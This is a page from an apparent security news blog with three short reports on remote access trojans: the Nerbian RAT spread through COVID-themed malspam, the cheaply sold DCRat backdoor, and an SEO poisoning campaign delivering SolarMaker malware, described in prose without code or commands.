May 13 2022

New Nerbian RAT spreads via malspam campaigns using COVID-19

Category: MalwareDISC @ 8:41 am
New Nerbian RAT spreads via malspam campaigns using COVID-19

Researchers spotted a new remote access trojan, named Nerbian RAT, which implements sophisticated evasion and anti-analysis techniques.

Researchers from Proofpoint discovered a new remote access trojan called Nerbian RAT that implements sophisticated anti-analysis and anti-reversing capabilities.

The malware spreads via malspam campaigns using COVID-19 and World Health Organization (WHO) themes. The name of the RAT comes from a named function in the source code of the malware, Nerbia is a fictional place from the novel Don Quixote

WHO nerbian RAT

he Nerbian RAT is written in Go programming language, compiled for 64-bit systems, to make the malware multiplatform.

The malspam campaign spotted by Proofpoint started on April 26 and targeted multiple industries.

“Starting on April 26, 2022, Proofpoint researchers observed a low volume (less than 100 messages) email-borne malware campaign sent to multiple industries. The threat disproportionately impacts entities in Italy, Spain, and the United Kingdom.” reads the analysis published by Proofpoint “The emails claimed to be representing the World Health Organization (WHO) with important information regarding COVID-19.” 

he emails contain a weaponized Word attachment, which is sometimes compressed with RAR. Upon enabling the macros, the document provided reveals information relating to COVID-19 safety, specifically about measures for self-isolation of infected individuals.

The document contains logos from the Health Service Executive (HSE), Government of Ireland, and National Council for the Blind of Ireland (NCBI).

Once opened the document and enabled the macro, a bat file executes a PowerShell acting as downloader for a Goland 64-bit dropper named “UpdateUAV.exe”.

The UpdateUAV executable is a dropper for the Nerbian RAT and borrows the code from various GitHub projects.

The Nerbian RAT supports a variety of different functions, such as logging keystrokes and capturing images of the screen, and handle communications over SSL.

“Proofpoint assesses with high confidence that the dropper and RAT were both created by the same entity, and while the dropper may be modified to deliver different payloads in the future, the dropper is statically configured to download and establish persistence for this specific payload at the time of analysis.” concludes the report that includes indicators of compromise (IoCs).

malspam – spam email that delivers malware

Anti-spam and Email Security

User’s Guide to Securing External Devices for Telework and Remote Access

👇 Please Follow our LI page…


DISC InfoSec

#InfoSecTools and #InfoSectraining

#InfoSecLatestTitles

#InfoSecServices

Tags: COVID-19, malspam attack, remote access trojan (RAT)

May 10 2022

DCRat, only $5 for a fully working remote access trojan

Category: Access Control,Remote codeDISC @ 8:21 am
DCRat, only $5 for a fully working remote access trojan

Researchers warn of a remote access trojan called DCRat (aka DarkCrystal RAT) that is available for sale on Russian cybercrime forums.

Cybersecurity researchers from BlackBerry are warning of a remote access trojan called DCRat (aka DarkCrystal RAT) that is available for sale on Russian cybercrime forums. The DCRat backdoor is very cheap, it appears to be the work of a lone threat actor that goes online with the monikers of “boldenis44,” “crystalcoder,” and Кодер (“Coder”). Prices for the backdoor start at 500 RUB ($5) for a two-month license, 2,200 RUB ($21) for a year, and 4,200 RUB ($40) for a lifetime subscription.

“Sold predominantly on Russian underground forums, DCRat is one of the cheapest commercial RATs we’ve ever come across. The price for this backdoor starts at 500 RUB (less than 5 GBP/US$6) for a two-month subscription, and occasionally dips even lower during special promotions. No wonder it’s so popular with professional threat actors as well as script kiddies.” reads the report published by BlackBerry.

The author implemented an effective malware and continues to efficiently maintain it. The researchers pointed out that the price for this malware is a fraction of the standard price such RAT on Russian underground forums.

DCRat first appeared in the threat landscape in 2018, but a year later it was redesigned and relaunched.

DCRat is written in .NET and has a modular structure, affiliates could develop their own plugins by using a dedicated integrated development environment (IDE) called DCRat Studio.

The modular architecture of the malware allows to extend its functionalities for multiple malicious purposes, including surveillance, reconnaissance, information theft, DDoS attacks, and arbitrary code execution.

The DCRat consists of three components:

  • A stealer/client executable
  • A single PHP page, serving as the command-and-control (C2) endpoint/interface
  • An administrator tool

“All DCRat marketing and sales operations are done through the popular Russian hacking forum lolz.guru, which also handles some of the DCRat pre-sales queries. DCRat support topics are made available here to the wider public, while the main DCRat offering thread is restricted to registered users only.” continues the report.

The malware is under active development, the author announces any news and updates through a dedicated Telegram channel that had approximately 3k subscribers.

dcrat
DCRat Telegram announcing discounts and price specials (source BlackBerry)

During recent months, the researchers ofter observed DCRat clients being deployed with the use of Cobalt Strike beacons through the Prometheus TDS (traffic direction system).

DCRat also implements a kill switch, which would render all instances of the DCRat administrator tool unusable, irrespective of subscriber license validity.

The Administrator tool allows subscribers to sign in to an active C2 server, configure (and generate) builds of the DCRat client executable, execute commands on infected systems

Experts concluded that the RAT is maintained daily, which means that the author is working on this project full-time.

“There are certainly programming choices in this threat that point to this being a novice malware author who hasn’t yet figured out an appropriate pricing structure. Choosing to program the threat in JPHP and adding a bizarrely non-functional infection counter certainly point in this direction. It could be that this threat is from an author trying to gain notoriety, doing the best with the knowledge they have to make something popular as quickly as possible.” concludes the report that also includes Indicators of Compromise (IoCs). “While the author’s apparent inexperience might make this malicious tool seem less appealing, some could view it as an opportunity. More experienced threat actors might see this inexperience as a selling point, as the author seems to be putting in a lot of time and effort to please their customers.”

👇 Please Follow our LI page…


DISC InfoSec

#InfoSecTools and #InfoSectraining

#InfoSecLatestTitles

#InfoSecServices

Tags: RAT, remote access trojan, remote access trojan (RAT)

Jun 14 2021

SEO poisoning campaign aims at delivering RAT, Microsoft warns

Category: TrojanDISC @ 1:04 pm
SEO poisoning campaign aims at delivering RAT, Microsoft warns

Microsoft spotted a series of attacks that use SEO poisoning to deliver a remote access trojan (RAT) used by threat actors to steal sensitive data.

Microsoft is monitoring a wave of cyber attacks that leverages SEO poisoning to deliver a remote access trojan (RAT) to steal sensitive data from the infected systems

The IT giant revealed that the SEO poisoning technique is effective, its Microsoft Defender Antivirus has thousands of PDF documents delivered as part of the ongoing campaign.

Upon opening the PDF files, users are prompted to download a .doc file or a .pdf version of their desired info. Once clicked the links, users will be redirected through 5 to 7 sites with TLDs like .site, .tk, and .ga. The sites appear as a clone of Google Drive web pages used to serve the SolarMaker malware.

Microsoft experts noticed that the PDF files are hosted on Amazon Web Services and Strikingly primarily.

RATS! How Hackers Take Over Your Computer: An Introduction to Remote Access Trojans by [James Wilson]

Tags: remote access trojan (RAT)